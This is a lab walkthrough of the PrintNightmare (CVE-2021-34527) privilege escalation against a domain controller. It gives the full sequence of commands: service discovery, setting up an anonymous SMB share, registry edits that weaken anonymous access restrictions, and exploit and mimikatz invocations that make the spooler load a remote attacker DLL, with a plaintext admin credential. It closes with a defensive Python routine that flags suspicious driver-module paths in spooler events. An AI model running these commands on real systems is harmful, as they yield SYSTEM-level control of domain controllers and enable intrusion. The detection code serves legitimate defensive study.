CVE-2021-34527: PrintNightmare privilege escalation inside a domain
- Domain controller: IP 192.168.72.21, hostname dc01
- Attacker's domain-joined machine: IP 192.168.72.158, hostname WIN10-01
- Attacker's Kali machine: IP 192.168.72.162
If the target machine has the Print Spooler service running, this vulnerability lets an attacker inject code into spoolsv.exe, the Print Spooler service process, and execute it with SYSTEM privileges.
Lab walkthrough
Check whether the MS-RPRN service is exposed
python3 rpcdump.py @192.168.72.163 | grep MS-RPRN
Create an SMB share on Linux
The purpose is to let the target reach Evil.dll.
Edit the SMB configuration file /etc/samba/smb.conf:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
Start the SMB service
# start the smb service and check its status
service smbd start
service smbd status
Create an SMB share on Windows
mkdir C:\share\
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
powershell.exe New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
Attack with the CVE-2021-1675.py script
python CVE-2021-1675.py HACK.com/administrator:p-0p-0p-0@192.168.72.21 \\192.168.72.158\share\demon.dll
python printnightmare.py -dll \\192.168.72.158\share\demon.dll administrator:p-0p-0p-0@192.168.72.21
As you can see here, in my environment the DLL can be uploaded but cannot be loaded.
Attack with mimikatz
mimikatz.exe "misc::printnightmare /server:192.168.72.163 /library:\\192.168.72.158\share\demon.x64.dll"
mimikatz.exe "misc::printnightmare /server:10.211.55.14 /library:\\10.211.55.7\share\1.dll"
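Every step above ends with the spooler installing a "driver" whose module comes from an attacker-controlled UNC share and is staged under the spooler's driver directory. The added example below (not part of the original write-up, and not from any of the tools it uses) is a small triage routine for the defender's side: it scans records shaped like Microsoft-Windows-PrintService events 316 (driver added or updated) and 808 (spooler failed to load a plug-in module) and flags driver modules that point at a UNC path or at the spooler's new/old staging folders. The record layout, regexes and sample messages are constructed assumptions for this exercise, not a real log export format.

```python
"""Triage Print Spooler driver events for PrintNightmare-style abuse.

Added example; the record shape below is an assumption modelled on
PrintService event 316 (driver added/updated) and 808 (plug-in load failed).
"""
import re
from typing import List, Tuple

# (event_id, message) pairs, constructed to mimic the two event shapes.
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    (316, r"Printer driver HP Universal Printing PCL 6 for Windows x64 "
          r"Version-3 was added or updated. Files:- UNIDRV.DLL, hpcu250u.dll. "
          r"No user action is required."),
    (316, r"Printer driver 1234 for Windows x64 Version-3 was added or updated. "
          r"Files:- \\192.168.72.158\share\demon.dll. No user action is required."),
    (808, r"The print spooler failed to load a plug-in module "
          r"C:\Windows\System32\spool\DRIVERS\x64\3\old\1\demon.dll, error code 0x45A."),
    (808, r"The print spooler failed to load a plug-in module "
          r"C:\Windows\System32\spool\DRIVERS\x64\3\hpcu250u.dll, error code 0x7E."),
]

UNC_PATH = re.compile(r"\\\\[\w.\-]+\\[^\s,]+")              # \\host\share\file
STAGING_DIR = re.compile(r"\\spool\\drivers\\x64\\3\\(new|old)\\", re.IGNORECASE)

def suspicious_modules(events: List[Tuple[int, str]]) -> List[Tuple[int, str]]:
    """Return (event_id, module) for each driver module that looks attacker-supplied."""
    hits = []
    for event_id, msg in events:
        if event_id == 316:
            # The module list sits between "Files:-" and the closing sentence.
            m = re.search(r"Files:-\s*(.*?)\.\s*No user action", msg)
            modules = [f.strip() for f in m.group(1).split(",")] if m else []
        elif event_id == 808:
            m = re.search(r"plug-in module\s+(\S+?),", msg)
            modules = [m.group(1)] if m else []
        else:
            continue
        for mod in modules:
            if UNC_PATH.match(mod) or STAGING_DIR.search(mod):
                hits.append((event_id, mod))
    return hits

if __name__ == "__main__":
    for event_id, mod in suspicious_modules(SAMPLE_EVENTS):
        print(f"event {event_id}: suspicious driver module {mod}")
```

A real deployment would feed exported PrintService events into suspicious_modules and pair any hit with the spooler's service state on domain controllers, where the service is rarely needed.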